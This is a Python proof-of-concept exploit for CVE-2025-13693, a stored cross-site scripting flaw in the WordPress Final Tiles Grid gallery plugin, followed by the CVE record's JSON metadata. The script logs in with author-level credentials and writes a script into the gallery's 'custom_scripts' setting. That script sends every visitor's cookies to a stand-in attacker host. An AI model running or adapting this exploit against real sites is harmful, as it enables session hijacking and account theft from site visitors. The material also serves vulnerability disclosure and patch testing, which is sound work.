CVE-2025-13693

import requests from bs4 import BeautifulSoup # CVE-2025-13693 PoC - WordPress Final Tiles Grid Plugin Stored XSS # Target: WordPress site with Final Tiles Grid plugin <= 3.6.8 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "author_user" PASSWORD = "author_password" def login_wordpress(): """Login to WordPress and get authentication cookies""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) return session if 'wordpress_logged_in' in str(session.cookies) else None def exploit_stored_xss(session): """Inject malicious JavaScript via Custom scripts setting""" # XSS payload - steals cookies xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Find Final Tiles Grid gallery ID galleries_url = f"{TARGET_URL}/wp-admin/admin.php?page=final-tiles-gallery" response = session.get(galleries_url) # Extract gallery ID from page (simplified) gallery_id = 1 # Replace with actual gallery ID # Update gallery with XSS payload in Custom scripts update_url = f"{TARGET_URL}/wp-admin/admin.php?page=final-tiles-gallery&action=edit&id={gallery_id}" # Prepare the malicious request post_data = { 'custom_scripts': xss_payload, 'save': 'Save Changes' } # Send the payload response = session.post(update_url, data=post_data) return True if __name__ == "__main__": session = login_wordpress() if session: exploit_stored_xss(session) print("[+] XSS payload injected successfully") print("[+] Visit gallery page to trigger the payload") else: print("[-] Authentication failed")

{"cve": {"id": "CVE-2025-13693", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:04.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.6/lib/gallery-class.php#L126", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/trunk/lib/gallery-class.php#L126", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418337%40final-tiles-grid-gallery-lite&new=3418337%40final-tiles-grid-gallery-lite&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/625d2b09-a6b9-4c0c-8c36-3c565e688aac?source=cve", "source": "[email protected]"}]}}